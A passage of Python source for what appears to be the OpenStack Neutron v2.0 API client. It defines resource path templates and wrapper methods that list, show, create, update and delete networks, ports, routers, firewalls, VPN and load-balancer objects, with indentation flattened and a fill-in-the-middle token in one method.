vip_path = "/lb/vips/%s"
pools_path = "/lb/pools"
pool_path = "/lb/pools/%s"
pool_path_stats = "/lb/pools/%s/stats"
members_path = "/lb/members"
member_path = "/lb/members/%s"
health_monitors_path = "/lb/health_monitors"
health_monitor_path = "/lb/health_monitors/%s"
associate_pool_health_monitors_path = "/lb/pools/%s/health_monitors"
disassociate_pool_health_monitors_path = (
"/lb/pools/%(pool)s/health_monitors/%(health_monitor)s")
qos_queues_path = "/qos-queues"
qos_queue_path = "/qos-queues/%s"
agents_path = "/agents"
agent_path = "/agents/%s"
network_gateways_path = "/network-gateways"
network_gateway_path = "/network-gateways/%s"
gateway_devices_path = "/gateway-devices"
gateway_device_path = "/gateway-devices/%s"
service_providers_path = "/service-providers"
credentials_path = "/credentials"
credential_path = "/credentials/%s"
network_profiles_path = "/network_profiles"
network_profile_path = "/network_profiles/%s"
network_profile_bindings_path = "/network_profile_bindings"
policy_profiles_path = "/policy_profiles"
policy_profile_path = "/policy_profiles/%s"
policy_profile_bindings_path = "/policy_profile_bindings"
metering_labels_path = "/metering/metering-labels"
metering_label_path = "/metering/metering-labels/%s"
metering_label_rules_path = "/metering/metering-label-rules"
metering_label_rule_path = "/metering/metering-label-rules/%s"
packet_filters_path = "/packet_filters"
packet_filter_path = "/packet_filters/%s"
DHCP_NETS = '/dhcp-networks'
DHCP_AGENTS = '/dhcp-agents'
L3_ROUTERS = '/l3-routers'
L3_AGENTS = '/l3-agents'
LOADBALANCER_POOLS = '/loadbalancer-pools'
LOADBALANCER_AGENT = '/loadbalancer-agent'
firewall_rules_path = "/fw/firewall_rules"
firewall_rule_path = "/fw/firewall_rules/%s"
firewall_policies_path = "/fw/firewall_policies"
firewall_policy_path = "/fw/firewall_policies/%s"
firewall_policy_insert_path = "/fw/firewall_policies/%s/insert_rule"
firewall_policy_remove_path = "/fw/firewall_policies/%s/remove_rule"
firewalls_path = "/fw/firewalls"
firewall_path = "/fw/firewalls/%s"
net_partitions_path = "/net-partitions"
net_partition_path = "/net-partitions/%s"
# API has no way to report plurals, so we have to hard code them
EXTED_PLURALS = {'routers': 'router',
'floatingips': 'floatingip',
'service_types': 'service_type',
'service_definitions': 'service_definition',
'security_groups': 'security_group',
'security_group_rules': 'security_group_rule',
'ipsecpolicies': 'ipsecpolicy',
'ikepolicies': 'ikepolicy',
'ipsec_site_connections': 'ipsec_site_connection',
'vpnservices': 'vpnservice',
'vips': 'vip',
'pools': 'pool',
'members': 'member',
'health_monitors': 'health_monitor',
'quotas': 'quota',
'service_providers': 'service_provider',
'firewall_rules': 'firewall_rule',
'firewall_policies': 'firewall_policy',
'firewalls': 'firewall',
'metering_labels': 'metering_label',
'metering_label_rules': 'metering_label_rule',
'net_partitions': 'net_partition',
'packet_filters': 'packet_filter',
}
# 8192 Is the default max URI len for eventlet.wsgi.server
MAX_URI_LEN = 8192
def get_attr_metadata(self):
if self.format == 'json':
return {}
old_request_format = self.format
self.format = 'json'
exts = self.list_extensions()['extensions']
self.format = old_request_format
ns = dict([(ext['alias'], ext['namespace']) for ext in exts])
self.EXTED_PLURALS.update(constants.PLURALS)
return {'plurals': self.EXTED_PLURALS,
'xmlns': constants.XML_NS_V20,
constants.EXT_NS: ns}
@APIParamsCall
def get_quotas_tenant(self, **_params):
"""Fetch tenant info in server's context for following quota operation.
"""
return self.get(self.quota_path % 'tenant', params=_params)
@APIParamsCall
def list_quotas(self, **_params):
"""Fetch all tenants' quotas."""
return self.get(self.quotas_path, params=_params)
@APIParamsCall
def show_quota(self, tenant_id, **_params):
"""Fetch information of a certain tenant's quotas."""
return self.get(self.quota_path % (tenant_id), params=_params)
@APIParamsCall
def update_quota(self, tenant_id, body=None):
"""Update a tenant's quotas."""
return self.put(self.quota_path % (tenant_id), body=body)
@APIParamsCall
def delete_quota(self, tenant_id):
"""Delete the specified tenant's quota values."""
return self.delete(self.quota_path % (tenant_id))
@APIParamsCall
def list_extensions(self, **_params):
"""Fetch a list of all exts on server side."""
return self.get(self.extensions_path, params=_params)
@APIParamsCall
def show_extension(self, ext_alias, **_params):
"""Fetch a list of all exts on server side."""
return self.get(self.extension_path % ext_alias, params=_params)
@APIParamsCall
def list_ports(self, retrieve_all=True, **_params):
"""Fetches a list of all networks for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('ports', self.ports_path, retrieve_all,
**_params)
@APIParamsCall
def show_port(self, port, **_params):
"""Fetches information of a certain network."""
return self.get(self.port_path % (port), params=_params)
@APIParamsCall
def create_port(self, body=None):
"""Creates a new port."""
return self.post(self.ports_path, body=body)
@APIParamsCall
def update_port(self, port, body=None):
"""Updates a port."""
return self.put(self.port_path % (port), body=body)
@APIParamsCall
def delete_port(self, port):
"""Deletes the specified port."""
return self.delete(self.port_path % (port))
@APIParamsCall
def list_networks(self, retrieve_all=True, **_params):
"""Fetches a list of all networks for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('networks', self.networks_path, retrieve_all,
**_params)
@APIParamsCall
def show_network(self, network, **_params):
"""Fetches information of a certain network."""
return self.get(self.network_path % (network), params=_params)
@APIParamsCall
def create_network(self, body=None):
"""Creates a new network."""
return self.post(self.networks_path, body=body)
@APIParamsCall
def update_network(self, network, body=None):
"""Updates a network."""
return self.put(self.network_path % (network), body=body)
@APIParamsCall
def delete_network(self, network):
"""Deletes the specified network."""
return self.delete(self.network_path % (network))
@APIParamsCall
def list_subnets(self, retrieve_all=True, **_params):
"""Fetches a list of all networks for a tenant."""
return self.list('subnets', self.subnets_path, retrieve_all,
**_params)
@APIParamsCall
def show_subnet(self, subnet, **_params):
"""Fetches information of a certain subnet."""
return self.get(self.subnet_path % (subnet), params=_params)
@APIParamsCall
def create_subnet(self, body=None):
"""Creates a new subnet."""
return self.post(self.subnets_path, body=body)
@APIParamsCall
def update_subnet(self, subnet, body=None):
"""Updates a subnet."""
return self.put(self.subnet_path % (subnet), body=body)
@APIParamsCall
def delete_subnet(self, subnet):
"""Deletes the specified subnet."""
return self.delete(self.subnet_path % (subnet))
@APIParamsCall
def list_routers(self, retrieve_all=True, **_params):
"""Fetches a list of all routers for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('routers', self.routers_path, retrieve_all,
**_params)
@APIParamsCall
def show_router(self, router, **_params):
"""Fetches information of a certain router."""
return self.get(self.router_path % (router), params=_params)
@APIParamsCall
def create_router(self, body=None):
"""Creates a new router."""
return self.post(self.routers_path, body=body)
@APIParamsCall
def update_router(self, router, body=None):
"""Updates a router."""
return self.put(self.router_path % (router), body=body)
@APIParamsCall
def delete_router(self, router):
"""Deletes the specified router."""
return self.delete(self.router_path % (router))
@APIParamsCall
def add_interface_router(self, router, body=None):
"""Adds an internal network interface to the specified router."""
return self.put((self.router_path % router) + "/add_router_interface",
body=body)
@APIParamsCall
def remove_interface_router(self, router, body=None):
"""Removes an internal network interface from the specified router."""
return self.put((self.router_path % router) +
"/remove_router_interface", body=body)
@APIParamsCall
def add_gateway_router(self, router, body=None):
"""Adds an external network gateway to the specified router."""
return self.put((self.router_path % router),
body={'router': {'external_gateway_info': body}})
@APIParamsCall
def remove_gateway_router(self, router):
"""Removes an external network gateway from the specified router."""
return self.put((self.router_path % router),
body={'router': {'external_gateway_info': {}}})
@APIParamsCall
def list_floatingips(self, retrieve_all=True, **_params):
"""Fetches a list of all floatingips for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('floatingips', self.floatingips_path, retrieve_all,
**_params)
@APIParamsCall
def show_floatingip(self, floatingip, **_params):
"""Fetches information of a certain floatingip."""
return self.get(self.floatingip_path % (floatingip), params=_params)
@APIParamsCall
def create_floatingip(self, body=None):
"""Creates a new floatingip."""
return self.post(self.floatingips_path, body=body)
@APIParamsCall
def update_floatingip(self, floatingip, body=None):
"""Updates a floatingip."""
return self.put(self.floatingip_path % (floatingip), body=body)
@APIParamsCall
def delete_floatingip(self, floatingip):
"""Deletes the specified floatingip."""
return self.delete(self.floatingip_path % (floatingip))
@APIParamsCall
def create_security_group(self, body=None):
"""Creates a new security group."""
return self.post(self.security_groups_path, body=body)
@APIParamsCall
def update_security_group(self, security_group, body=None):
"""Updates a security group."""
return self.put(self.security_group_path %
security_group, body=body)
@APIParamsCall
def list_security_groups(self, retrieve_all=True, **_params):
"""Fetches a list of all security groups for a tenant."""
return self.list('security_groups', self.security_groups_path,
retrieve_all, **_params)
@APIParamsCall
def show_security_group(self, security_group, **_params):
"""Fetches information of a certain security group."""
return self.get(self.security_group_path % (security_group),
params=_params)
@APIParamsCall
def delete_security_group(self, security_group):
"""Deletes the specified security group."""
return self.delete(self.security_group_path % (security_group))
@APIParamsCall
def create_security_group_rule(self, body=None):
"""Creates a new security group rule."""
return self.post(self.security_group_rules_path, body=body)
@APIParamsCall
def delete_security_group_rule(self, security_group_rule):
"""Deletes the specified security group rule."""
return self.delete(self.security_group_rule_path %
(security_group_rule))
@APIParamsCall
def list_security_group_rules(self, retrieve_all=True, **_params):
"""Fetches a list of all security group rules for a tenant."""
return self.list('security_group_rules',
self.security_group_rules_path,
retrieve_all, **_params)
@APIParamsCall
def show_security_group_rule(self, security_group_rule, **_params):
"""Fetches information of a certain security group rule."""
return self.get(self.security_group_rule_path % (security_group_rule),
params=_params)
@APIParamsCall
def list_vpnservices(self, retrieve_all=True, **_params):
"""Fetches a list of all configured VPN services for a tenant."""
return self.list('vpnservices', self.vpnservices_path, retrieve_all,
**_params)
@APIParamsCall
def show_vpnservice(self, vpnservice, **_params):
"""Fetches information of a specific VPN service."""
return self.get(self.vpnservice_path % (vpnservice), params=_params)
@APIParamsCall
def create_vpnservice(self, body=None):
"""Creates a new VPN service."""
return self.post(self.vpnservices_path, body=body)
@APIParamsCall
def update_vpnservice(self, vpnservice, body=None):
"""Updates a VPN service."""
return self.put(self.vpnservice_path % (vpnservice), body=body)
@APIParamsCall
def delete_vpnservice(self, vpnservice):
"""Deletes the specified VPN service."""
return self.delete(self.vpnservice_path % (vpnservice))
@APIParamsCall
def list_ipsec_site_connections(self, retrieve_all=True, **_params):
"""Fetches all configured IPsecSiteConnections for a tenant."""
return self.list('ipsec_site_connections',
self.ipsec_site_connections_path,
retrieve_all,
**_params)
@APIParamsCall
def show_ipsec_site_connection(self, ipsecsite_conn, **_params):
"""Fetches information of a specific IPsecSiteConnection."""
return self.get(
self.ipsec_site_connection_path % (ipsecsite_conn), params=_params
)
@APIParamsCall
def create_ipsec_site_connection(self, body=None):
"""Creates a new IPsecSiteConnection."""
return self.post(self.ipsec_site_connections_path, body=body)
@APIParamsCall
def update_ipsec_site_connection(self, ipsecsite_conn, body=None):
"""Updates an IPsecSiteConnection."""
return self.put(
self.ipsec_site_connection_path % (ipsecsite_conn), body=body
)
@APIParamsCall
def delete_ipsec_site_connection(self, ipsecsite_conn):
"""Deletes the specified IPsecSiteConnection."""
return self.delete(self.ipsec_site_connection_path % (ipsecsite_conn))
@APIParamsCall
def list_ikepolicies(self, retrieve_all=True, **_params):
"""Fetches a list of all configured IKEPolicies for a tenant."""
return self.list('ikepolicies', self.ikepolicies_path, retrieve_all,
**_params)
@APIParamsCall
def show_ikepolicy(self, ikepolicy, **_params):
"""Fetches information of a specific IKEPolicy."""
return self.get(self.ikepolicy_path % (ikepolicy), params=_params)
@APIParamsCall
def create_ikepolicy(self, body=None):
"""Creates a new IKEPolicy."""
return self.post(self.ikepolicies_path, body=body)
@APIParamsCall
def update_ikepolicy(self, ikepolicy, body=None):
"""Updates an IKEPolicy."""
return self.put(self.ikepolicy_path % (ikepolicy), body=body)
@APIParamsCall
def delete_ikepolicy(self, ikepolicy):
"""Deletes the specified IKEPolicy."""
return self.delete(self.ikepolicy_path % (ikepolicy))
@APIParamsCall
def list_ipsecpolicies(self, retrieve_all=True, **_params):
"""Fetches a list of all configured IPsecPolicies for a tenant."""
return self.list('ipsecpolicies',
self.ipsecpolicies_path,
retrieve_all,
**_params)
@APIParamsCall
def show_ipsecpolicy(self, ipsecpolicy, **_params):
"""Fetches information of a specific IPsecPolicy."""
return self.get(self.ipsecpolicy_path % (ipsecpolicy), params=_params)
@APIParamsCall
def create_ipsecpolicy(self, body=None):
"""Creates a new IPsecPolicy."""
return self.post(self.ipsecpolicies_path, body=body)
@APIParamsCall
def update_ipsecpolicy(self, ipsecpolicy, body=None):
"""Updates an IPsecPolicy."""
return self.put(self.ipsecpolicy_path % (ipsecpolicy), body=body)
@APIParamsCall
def delete_ipsecpolicy(self, ipsecpolicy):
"""Deletes the specified IPsecPolicy."""
return self.delete(self.ipsecpolicy_path % (ipsecpolicy))
@APIParamsCall
def list_vips(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer vips for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('vips', self.vips_path, retrieve_all,
**_params)
@APIParamsCall
def show_vip(self, vip, **_params):
"""Fetches information of a certain load balancer vip."""
return self.get(self.vip_path % (vip), params=_params)
@APIParamsCall
def create_vip(self, body=None):
"""Creates a new load balancer vip."""
return self.post(self.vips_path, body=body)
@APIParamsCall
def update_vip(self, vip, body=None):
"""Updates a load balancer vip."""
return self.put(self.vip_path % (vip), body=body)
@APIParamsCall
def delete_vip(self, vip):
"""Deletes the specified load balancer vip."""
return self.delete(self.vip_path % (vip))
@APIParamsCall
def list_pools(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer pools for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('pools', self.pools_path, retrieve_all,
**_params)
@APIParamsCall
def show_pool(self, pool, **_params):
"""Fetches information of a certain load balancer pool."""
return self.get(self.pool_path % (pool), params=_params)
@APIParamsCall
def create_pool(self, body=None):
"""Creates a new load balancer pool."""
return self.post(self.pools_path, body=body)
@APIParamsCall
def update_pool(self, pool, body=None):
"""Updates a load balancer pool."""
return self.put(self.pool_path % (pool), body=body)
@APIParamsCall
def delete_pool(self, pool):
"""Deletes the specified load balancer pool."""
return self.delete(self.pool_path % (pool))
@APIParamsCall
def retrieve_pool_stats(self, pool, **_params):
"""Retrieves stats for a certain load balancer pool."""
return self.get(self.pool_path_stats % (pool), params=_params)
@APIParamsCall
def list_members(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer members for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('members', self.members_path, retrieve_all,
**_params)
@APIParamsCall
def show_member(self, member, **_params):
"""Fetches information of a certain load balancer member."""
return self.get(self.member_path % (member), params=_params)
@APIParamsCall
def create_member(self, body=None):
"""Creates a new load balancer member."""
return self.post(self.members_path, body=body)
@APIParamsCall
def update_member(self, member, body=None):
"""Updates a load balancer member."""
return self.put(self.member_path % (member), body=body)
@APIParamsCall
def delete_member(self, member):
"""Deletes the specified load balancer member."""
return self.delete(self.member_path % (member))
@APIParamsCall
def list_health_monitors(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer health monitors for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('health_monitors', self.health_monitors_path,
retrieve_all, **_params)
@APIParamsCall
def show_health_monitor(self, health_monitor, **_params):
"""Fetches information of a certain load balancer health monitor."""
return self.get(self.health_monitor_path % (health_monitor),
params=_params)
@APIParamsCall
def create_health_monitor(self, body=None):
"""Creates a new load balancer health monitor."""
return self.post(self.health_monitors_path, body=body)
@APIParamsCall
def update_health_monitor(self, health_monitor, body=None):
"""Updates a load balancer health monitor."""
return self.put(self.health_monitor_path % (health_monitor), body=body)
@APIParamsCall
def delete_health_monitor(self, health_monitor):
"""Deletes the specified load balancer health monitor."""
return self.delete(self.health_monitor_path % (health_monitor))
@APIParamsCall
def associate_health_monitor(self, pool, body):
"""Associate specified load balancer health monitor and pool."""
return self.post(self.associate_pool_health_monitors_path % (pool),
body=body)
@APIParamsCall
def disassociate_health_monitor(self, pool, health_monitor):
"""Disassociate specified load balancer health monitor and pool."""
path = (self.disassociate_pool_health_monitors_path %
{'pool': pool, 'health_monitor': health_monitor})
return self.delete(path)
@APIParamsCall
def create_qos_queue(self, body=None):
"""Creates a new queue."""
return self.post(self.qos_queues_path, body=body)
@APIParamsCall
def list_qos_queues(self, **_params):
"""Fetches a list of all queues for a tenant."""
return self.get(self.qos_queues_path, params=_params)
@APIParamsCall
def show_qos_queue(self, queue, **_params):
"""Fetches information of a certain queue."""
return self.get(self.qos_queue_path % (queue),
params=_params)
@APIParamsCall
def delete_qos_queue(self, queue):
"""Deletes the specified queue."""
return self.delete(self.qos_queue_path % (queue))
@APIParamsCall
def list_agents(self, **_params):
"""Fetches agents."""
# Pass filters in "params" argument to do_request
return self.get(self.agents_path, params=_params)
@APIParamsCall
def show_agent(self, agent, **_params):
"""Fetches information of a certain agent."""
return self.get(self.agent_path % (agent), params=_params)
@APIParamsCall
def update_agent(self, agent, body=None):
"""Updates an agent."""
return self.put(self.agent_path % (agent), body=body)
@APIParamsCall
def delete_agent(self, agent):
"""Deletes the specified agent."""
return self.delete(self.agent_path % (agent))
@APIParamsCall
def list_network_gateways(self, **_params):
"""Retrieve network gateways."""
return self.get(self.network_gateways_path, params=_params)
@APIParamsCall
def show_network_gateway(self, gateway_id, **_params):
"""Fetch a network gateway."""
return self.get(self.network_gateway_path % gateway_id, params=_params)
@APIParamsCall
def create_network_gateway(self, body=None):
"""Create a new network gateway."""
return self.post(self.network_gateways_path, body=body)
@APIParamsCall
def update_network_gateway(self, gateway_id, body=None):
"""Update a network gateway."""
return self.put(self.network_gateway_path % gateway_id, body=body)
@APIParamsCall
def delete_network_gateway(self, gateway_id):
"""Delete the specified network gateway."""
return self.delete(self.network_gateway_path % gateway_id)
@APIParamsCall
def connect_network_gateway(self, gateway_id, body=None):
"""Connect a network gateway to the specified network."""
base_uri = self.network_gateway_path % gateway_id
return self.put("%s/connect_network" % base_uri, body=body)
@APIParamsCall
def disconnect_network_gateway(self, gateway_id, body=None):
"""Disconnect a network from the specified gateway."""
base_uri = self.network_gateway_path % gateway_id
return self.put("%s/disconnect_network" % base_uri, body=body)
@APIParamsCall
def list_gateway_devices(self, **_params):
"""Retrieve gateway devices."""
return self.get(self.gateway_devices_path, params=_params)
@APIParamsCall
def show_gateway_device(self, gateway_device_id, **_params):
"""Fetch a gateway device."""
return self.get(self.gateway_device_path % gateway_device_id,
params=_params)
@APIParamsCall
def create_gateway_device(self, body=None):
"""Create a new gateway device."""
return self.post(self.gateway_devices_path, body=body)
@APIParamsCall
def update_gateway_device(self, gateway_device_id, body=None):
"""Updates a new gateway device."""
return self.put(self.gateway_device_path % gateway_device_id,
body=body)
@APIParamsCall
def delete_gateway_device(self, gateway_device_id):
"""Delete the specified gateway device."""
return self.delete(self.gateway_device_path % gateway_device_id)
@APIParamsCall
def list_dhcp_agent_hosting_networks(self, network, **_params):
"""Fetches a list of dhcp agents hosting a network."""
return self.get((self.network_path + self.DHCP_AGENTS) % network,
params=_params)
@APIParamsCall
def list_networks_on_dhcp_agent(self, dhcp_agent, **_params):
"""Fetches a list of dhcp agents hosting a network."""
return self.get((self.agent_path + self.DHCP_NETS) % dhcp_agent,
params=_params)
@APIParamsCall
def add_network_to_dhcp_agent(self, dhcp_agent, body=None):
"""Adds a network to dhcp agent."""
return self.post((self.agent_path + self.DHCP_NETS) % dhcp_agent,
body=body)
@APIParamsCall
def remove_network_from_dhcp_agent(self, dhcp_agent, network_id):
"""Remove a network from dhcp agent."""
return self.delete((self.agent_path + self.DHCP_NETS + "/%s") % (
dhcp_agent, network_id))
@APIParamsCall
def list_l3_agent_hosting_routers(self, router, **_params):
"""Fetches a list of L3 agents hosting a router."""
return self.get((self.router_path + self.L3_AGENTS) % router,
params=_params)
@APIParamsCall
def list_routers_on_l3_agent(self, l3_agent, **_params):
"""Fetches a list of L3 agents hosting a router."""
return self.get((self.agent_path + self.L3_ROUTERS) % l3_agent,
params=_params)
@APIParamsCall
def add_router_to_l3_agent(self, l3_agent, body):
"""Adds a router to L3 agent."""
return self.post((self.agent_path + self.L3_ROUTERS) % l3_agent,
body=body)
@APIParamsCall
def list_firewall_rules(self, retrieve_all=True, **_params):
"""Fetches a list of all firewall rules for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('firewall_rules', self.firewall_rules_path,
retrieve_all, **_params)
@APIParamsCall
def show_firewall_rule(self, firewall_rule, **_params):
"""Fetches information of a certain firewall rule."""
return self.get(self.firewall_rule_path % (firewall_rule),
params=_params)
@APIParamsCall
def create_firewall_rule(self, body=None):
"""Creates a new firewall rule."""
return self.post(self.firewall_rules_path, body=body)
@APIParamsCall
def update_firewall_rule(self, firewall_rule, body=None):
"""Updates a firewall rule."""
return self.put(self.firewall_rule_path % (firewall_rule), body=body)
@APIParamsCall
def delete_firewall_rule(self, firewall_rule):
"""Deletes the specified firewall rule."""
return self.delete(self.firewall_rule_path % (firewall_rule))
@APIParamsCall
def list_firewall_policies(self, retrieve_all=True, **_params):
"""Fetches a list of all firewall policies for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('firewall_policies', self.firewall_policies_path,
retrieve_all, **_params)
@APIParamsCall
def show_firewall_policy(self, firewall_policy, **_params):
"""Fetches information of a certain firewall policy."""
return self.get(self.firewall_policy_path % (firewall_policy),
params=_params)
@APIParamsCall
def create_firewall_policy(self, body=None):
"""Creates a new firewall policy."""
return self.post(self.firewall_policies_path, body=body)
@APIParamsCall
def update_firewall_policy(self, firewall_policy, body=None):
"""Updates a firewall policy."""
return self.put(self.firewall_policy_path % (firewall_policy),
body=body)
@APIParamsCall
def delete_firewall_policy(self, firewall_policy):
"""Deletes the specified firewall policy."""
return self.delete(self.firewall_policy_path % (firewall_policy))
@APIParamsCall
def firewall_policy_insert_rule(self, firewall_policy, body=None):
"""Inserts specified rule into firewall policy."""
return self.put(self.firewall_policy_insert_path % (firewall_policy),
body=body)
@APIParamsCall
def firewall_policy_remove_rule(self, firewall_policy, body=None):
"""Removes specified rule from firewall policy."""
return self.put(self.firewall_policy_remove_path % (firewall_policy),
body=body)
@APIParamsCall
def list_firewalls(self, retrieve_all=True, **_params):
"""Fetches a list of all firewals for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('firewalls', self.firewalls_path, retrieve_all,
**_params)
@APIParamsCall
def show_firewall(self, firewall, **_params):
"""Fetches information of a certain firewall."""
return self.get(self.firewall_path % (firewall), params=_params)
@APIParamsCall
def create_firewall(self, body=None):
"""Creates a new firewall."""
return self.post(self.firewalls_path, body=body)
@APIParamsCall
def update_firewall(self, firewall, body=None):
"""Updates a firewall."""
return self.put(self.firewall_path % (firewall), body=body)
@APIParamsCall
def delete_firewall(self, firewall):
"""Deletes the specified firewall."""
return self.delete(self.firewall_path % (firewall))
@APIParamsCall
def remove_router_from_l3_agent(self, l3_agent, router_id):
"""Remove a router from l3 agent."""
return self.delete((self.agent_path + self.L3_ROUTERS + "/%s") % (
l3_agent, router_id))
@APIParamsCall
def get_lbaas_agent_hosting_pool(self, pool, **_params):
"""Fetches a loadbalancer agent hosting a pool."""
return self.get((self.pool_path + self.LOADBALANCER_AGENT) % pool,
params=_params)
@APIParamsCall
def list_pools_on_lbaas_agent(self, lbaas_agent, **_params):
"""Fetches a list of pools hosted by the loadbalancer agent."""
return self.get((self.agent_path + self.LOADBALANCER_POOLS) %
lbaas_agent, params=_params)
@APIParamsCall
def list_service_providers(self, retrieve_all=True, **_params):
"""Fetches service providers."""
# Pass filters in "params" argument to do_request
return self.list('service_providers', self.service_providers_path,
retrieve_all, **_params)
def list_credentials(self, **_params):
"""Fetch a list of all credentials for a tenant."""
return self.get(self.credentials_path, params=_params)
@APIParamsCall
def show_credential(self, credential, **_params):
"""Fetch a credential."""
return self.get(self.credential_path % (credential), params=_params)
@APIParamsCall
def create_credential(self, body=None):
"""Create a new credential."""
return self.post(self.credentials_path, body=body)
@APIParamsCall
def update_credential(self, credential, body=None):
"""Update a credential."""
return self.put(self.credential_path % (credential), body=body)
@APIParamsCall
def delete_credential(self, credential):
"""Delete the specified credential."""
return self.delete(self.credential_path % (credential))
def list_network_profile_bindings(self, **params):
"""Fetch a list of all tenants associated for a network profile."""
return self.get(self.network_profile_bindings_path, params=params)
@APIParamsCall
def list_network_profiles(self, **params):
"""Fetch a list of all network profiles for a tenant."""
return self.get(self.network_profiles_path, params=params)
@APIParamsCall
def show_network_profile(self, profile, **params):
"""Fetch a network profile."""
return self.get(self.network_profile_path % (profile), params=params)
@APIParamsCall
def create_network_profile(self, body=None):
"""Create a network profile."""
return self.post(self.network_profiles_path, body=body)
@APIParamsCall
def update_network_profile(self, profile, body=None):
"""Update a network profile."""
return self.put(self.network_profile_path % (profile), body=body)
@APIParamsCall
def delete_network_profile(self, profile):
"""Delete the network profile."""
return self.delete(self.network_profile_path % profile)
@APIParamsCall
def list_policy_profile_bindings(self, **params):
"""Fetch a list of all tenants associated for a policy profile."""
return self.get(self.policy_profile_bindings_path, params=params)
@APIParamsCall
def list_policy_profiles(self, **params):
"""Fetch a list of all network profiles for a tenant."""
return self.get(self.policy_profiles_path, params=params)
@APIParamsCall
def show_policy_profile(self, profile, **params):
"""Fetch a network profile."""
return self.get(self.policy_profile_path % (profile), params=params)
@APIParamsCall
def update_policy_profile(self, profile, body=None):
"""Update a policy profile."""
return self.put(self.policy_profile_path % (profile), body=body)
@APIParamsCall
def create_metering_label(self, body=None):
"""Creates a metering label."""
return self.post(self.metering_labels_path, body=body)
@APIParamsCall
def delete_metering_label(self, label):
"""Deletes the specified metering label."""
return self.delete(self.metering_label_path % (label))
@APIParamsCall
def list_metering_labels(self, retrieve_all=True, **_params):
"""Fetches a list of all metering labels for a tenant."""
return self.list('metering_labels', self.metering_labels_path,
retrieve_all, **_params)
@APIParamsCall
def show_metering_label(self, metering_label, **_params):
"""Fetches information of a certain metering label."""
return self.get(self.metering_label_path %
(metering_label), params=_params)
@APIParamsCall
def create_metering_label_rule(self, body=None):
"""Creates a metering label rule."""
return self.post(self.metering_label_rules_path, body=body)
@APIParamsCall
def delete_metering_label_rule(self, rule):
"""Deletes the specified metering label rule."""
return self.delete(self.metering_label_rule_path % (rule))
@APIParamsCall
def list_metering_label_rules(self, retrieve_all=True, **_params):
"""Fetches a list of all metering label rules for a label."""
return self.list('metering_label_rules',
self.metering_label_rules_path, retrieve_all,
**_params)
@APIParamsCall
def show_metering_label_rule(self, metering_label_rule, **_params):
"""Fetches information of a certain metering label rule."""
return self.get(self.metering_label_rule_path %
(metering_label_rule), params=_params)
@APIParamsCall
def list_net_partitions(self, **params):
"""Fetch a list of all network partitions for a tenant."""
return self.get(self.net_partitions_path, params=params)
@APIParamsCall
def show_net_partition(self, netpartition, **params):
"""Fetch a network partition."""
return self.get(self.net_partition_path % (netpartition),
params=params)
@APIParamsCall
def create_net_partition(self, body=None):
"""Create a network partition."""
return self.post(self.net_partitions_path, body=body)
@APIParamsCall
def delete_net_partition(self, netpartition):
"""Delete the network partition."""
return self.delete(self.net_partition_path % netpartition)
@APIParamsCall
def create_packet_filter(self, body=None):
"""Create a new packet filter."""
return self.post(self.packet_filters_path, body=body)
@APIParamsCall
def update_packet_filter(self, packet_filter_id, body=None):
"""Update a packet filter."""
return self.put(self.packet_filter_path % packet_filter_id, body=body)
@APIParamsCall
def list_packet_filters(self, retrieve_all=True, **_params):
"""Fetch a list of all packet filters for a tenant."""
return self.list('packet_filters', self.packet_filters_path,
retrieve_all, **_params)
@APIParamsCall
def show_packet_filter(self, packet_filter_id, **_params):
"""Fetch information of a certain packet filter."""
return self.get(self.packet_filter_path % packet_filter_id,
params=_params)
@APIParamsCall
def delete_packet_filter(self, packet_filter_id):
"""Delete the specified packet filter."""
return self.delete(self.packet_filter_path % packet_filter_id)
def __init__(self, **kwargs):
"""Initialize a new client for the Neutron v2.0 API."""
super(Client, self).__init__()
self.retries = kwargs.pop('retries', 0)
self.raise_errors = kwargs.pop('raise_errors', True)
self.httpclient = client.construct_http_client(**kwargs)
self.version = '2.0'
self.format = 'json'
self.action_prefix = "/v%s" % (self.version)
self.retry_interval = 1
def _handle_fault_response(self, status_code, response_body):
# Create exception with HTTP status code and message
_logger.debug("Error message: %s", response_body)
# Add deserialized error message to exception arguments
try:
des_error_body = self.deserialize(response_body, status_code)
except Exception:
# If unable to deserialized body it is probably not a
# Neutron error
des_error_body = {'message': response_body}
# Raise the appropriate exception
exception_handler_v20(status_code, des_error_body)
def _check_uri_length(self, action):
uri_len = len(self.httpclient.endpoint_url) + len(action)
if uri_len > self.MAX_URI_LEN:
raise exceptions.RequestURITooLong(
excess=uri_len - self.MAX_URI_LEN)
def do_request(self, method, action, body=None, headers=None, params=None):
# Add format and tenant_id
action += ".%s" % self.format
action = self.action_prefix + action
if type(params) is dict and params:
params = utils.safe_encode_dict(params)
action += '?' + urllib.urlencode(params, doseq=1)
# Ensure client always has correct uri - do not guesstimate anything
self.httpclient.authenticate_and_fetch_endpoint_url()
self._check_uri_length(action)
if body:
body = self.serialize(body)
resp, replybody = self.httpclient.do_request(
action, method, body=body,
content_type=self.content_type())
status_code = resp.status_code
if status_code in (requests.codes.ok,
requests.codes.created,
requests.codes.accepted,
requests.codes.no_content):
return self.deserialize(replybody, status_code)
else:
if not replybody:
replybody = resp.reason
self._handle_fault_response(status_code, replybody)
def get_auth_info(self):
return self.httpclient.get_auth_info()
def serialize(self, data):<|fim▁hole|> """
if data is None:
return None
elif type(data) is dict:
return serializer.Serializer(
self.get_attr_metadata()).serialize(data, self.content_type())
else:
raise Exception(_("Unable to serialize object of type = '%s'") %
type(data))
def deserialize(self, data, status_code):
"""Deserializes an XML or JSON string into a dictionary."""
if status_code == 204:
return data
return serializer.Serializer(self.get_attr_metadata()).deserialize(
data, self.content_type())['body']
def content_type(self, _format=None):
"""Returns the mime-type for either 'xml' or 'json'.
Defaults to the currently set format.
"""
_format = _format or self.format
return "application/%s" % (_format)
def retry_request(self, method, action, body=None,
headers=None, params=None):
"""Call do_request with the default retry configuration.
